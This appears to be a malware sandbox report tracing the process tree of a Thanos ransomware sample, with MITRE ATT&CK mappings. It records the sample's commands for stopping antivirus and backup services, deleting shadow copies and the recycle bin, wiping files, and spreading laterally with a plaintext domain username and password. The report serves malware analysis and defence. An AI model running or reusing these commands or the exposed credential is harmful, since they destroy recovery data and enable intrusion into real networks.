  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3596,i,9678242258052679740,14200492059145445491,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3484 /prefetch:14
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - NTFS ADS
  PID:6524
- C:\Users\Admin\Downloads\thing.exe
  "C:\Users\Admin\Downloads\thing.exe"
  2⤵
  - Executes dropped EXE
  PID:6196
- - C:\Users\Admin\Downloads\thing.exe
    "C:\Users\Admin\Downloads\thing.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetWindowsHookEx
    PID:1080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1944
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa9400dcf8,0x7ffa9400dd04,0x7ffa9400dd10
  2⤵
  PID:2200

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:936

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3552

C:\Users\Admin\Desktop\Thanos.exe
"C:\Users\Admin\Desktop\Thanos.exe"
1⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Downloads MZ/PE file
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SendNotifyMessage
PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" Get-MpPreference -verbose
  2⤵
  PID:2904
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop avpsus /y
  2⤵
  PID:4948
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop avpsus /y
    3⤵
    PID:972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop McAfeeDLPAgentService /y
  2⤵
  PID:5228
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
    3⤵
    PID:3404
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop mfewc /y
  2⤵
  PID:4456
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop mfewc /y
    3⤵
    PID:2388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:3532
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BMR Boot Service /y
    3⤵
    PID:1520
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop NetBackup BMR MTFTP Service /y
  2⤵
  PID:1256
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
    3⤵
    PID:6376
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop DefWatch /y
  2⤵
  PID:3000
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop DefWatch /y
    3⤵
    PID:5460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccEvtMgr /y
  2⤵
  PID:4608
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccEvtMgr /y
    3⤵
    PID:6352
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop ccSetMgr /y
  2⤵
  PID:5312
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop ccSetMgr /y
    3⤵
    PID:5780
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop SavRoam /y
  2⤵
  PID:3156
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop SavRoam /y
    3⤵
    PID:6504
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop RTVscan /y
  2⤵
  PID:1180
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop RTVscan /y
    3⤵
    PID:2584
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBFCService /y
  2⤵
  PID:1904
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBFCService /y
    3⤵
    PID:2396
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBIDPService /y
  2⤵
  PID:5548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBIDPService /y
    3⤵
    PID:6472
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop Intuit.QuickBooks.FCS /y
  2⤵
  PID:2100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
    3⤵
    PID:6452
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop QBCFMonitorService /y
  2⤵
  PID:3736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop QBCFMonitorService /y
    3⤵
    PID:6632
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:5352
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooBackup /y
    3⤵
    PID:6568
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooIT /y
  2⤵
  PID:5500
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop YooIT /y
    3⤵
    PID:6512
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop zhudongfangyu /y
    3⤵
    PID:6440
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop stc_raw_agent /y
  2⤵
  PID:4740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop stc_raw_agent /y
    3⤵
    PID:6624
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VSNAPVSS /y
  2⤵
  PID:680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VSNAPVSS /y
    3⤵
    PID:6812
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamTransportSvc /y
  2⤵
  PID:5592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamTransportSvc /y
    3⤵
    PID:6712
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamDeploymentService /y
  2⤵
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamDeploymentService /y
    3⤵
    PID:6488
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop VeeamNFSSvc /y
  2⤵
  PID:6128
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop VeeamNFSSvc /y
    3⤵
    PID:6704
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop veeam /y
  2⤵
  PID:3092
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop veeam /y
    3⤵
    PID:6388
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop PDVFSService /y
  2⤵
  PID:4476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop PDVFSService /y
    3⤵
    PID:6480
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecVSSProvider /y
  2⤵
  PID:4292
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecVSSProvider /y
    3⤵
    PID:6592
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentAccelerator /y
  2⤵
  PID:736
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
    3⤵
    PID:6496
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecAgentBrowser /y
  2⤵
  PID:4364
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
    3⤵
    PID:6552
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecDiveciMediaService /y
  2⤵
  PID:4208
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
    3⤵
    PID:6148
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecJobEngine /y
  2⤵
  PID:2804
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecJobEngine /y
    3⤵
    PID:6188
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecManagementService /y
  2⤵
  PID:4288
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecManagementService /y
    3⤵
    PID:6740
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BackupExecRPCService /y
  2⤵
  PID:5680
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop BackupExecRPCService /y
    3⤵
    PID:6576
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcrSch2Svc /y
  2⤵
  PID:2996
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcrSch2Svc /y
    3⤵
    PID:6600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop AcronisAgent /y
  2⤵
  PID:5160
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop AcronisAgent /y
    3⤵
    PID:6460
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CASAD2DWebSvc /y
  2⤵
  PID:2548
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CASAD2DWebSvc /y
    3⤵
    PID:6764
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop CAARCUpdateSvc /y
  2⤵
  PID:3148
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop CAARCUpdateSvc /y
    3⤵
    PID:6908
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop sophos /y
  2⤵
  PID:1992
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop sophos /y
    3⤵
    PID:7028
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY start= disabled
  2⤵
  - Launches sc.exe
  PID:5772
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
  2⤵
  - Launches sc.exe
  PID:2612
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SQLWriter start= disabled
  2⤵
  - Launches sc.exe
  PID:3004
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  - Launches sc.exe
  PID:3872
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mspub.exe /F
  2⤵
  - Kills process with taskkill
  PID:3084
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopqos.exe /F
  2⤵
  - Kills process with taskkill
  PID:6076
- C:\Windows\SYSTEM32\taskkill.exe
  "taskkill.exe" /IM mydesktopservice.exe /F
  2⤵
  - Kills process with taskkill
  PID:5472
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:3816
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
  2⤵
  - Interacts with shadow copies
  PID:4504
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
  2⤵
  - Interacts with shadow copies
  PID:5544
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5176
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:3260
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:400
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1700
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5328
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:4488
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:248
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:5400
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:416
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
  2⤵
  - Enumerates connected drives
  - Interacts with shadow copies
  PID:1092
- C:\Windows\SYSTEM32\vssadmin.exe
  "vssadmin.exe" Delete Shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:1080
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
  2⤵
  PID:1912
- C:\Windows\SYSTEM32\net.exe
  "net.exe" use \\10.127.0.57 /USER:SHJPOLICE\amer !Omar2012
  2⤵
  PID:3588
- C:\Users\Admin\AppData\Local\Temp\gr2a4ksy.exe
  "C:\Users\Admin\AppData\Local\Temp\gr2a4ksy.exe" \10.127.0.57 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\Desktop\Thanos.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:228
- C:\Windows\SYSTEM32\arp.exe
  "arp" -a
  2⤵
  - Network Service Discovery
  PID:2868
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
  2⤵
  - Blocklisted process makes network request
  PID:5508
- C:\Windows\SYSTEM32\cmd.exe
  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  PID:3472
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.7 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:6764
- - C:\Windows\system32\fsutil.exe
    fsutil file setZeroData offset=0 length=524288 “%s”
    3⤵
    PID:2056
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Desktop\Thanos.exe
  2⤵
  PID:4404
- - C:\Windows\system32\choice.exe
    choice /C Y /N /D Y /T 3
    3⤵
    PID:6480

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:6932

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\23e43c69701847f59fffa6293a9c2175 /t 5272 /p 5508
1⤵
PID:6308

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Windows Management Instrumentation

T1047

Persistence

Create or Modify System Process

T1543

Windows Service

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

Defense Evasion

Direct Volume Access

T1006

Impair Defenses

T1562

Disable or Modify Tools

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry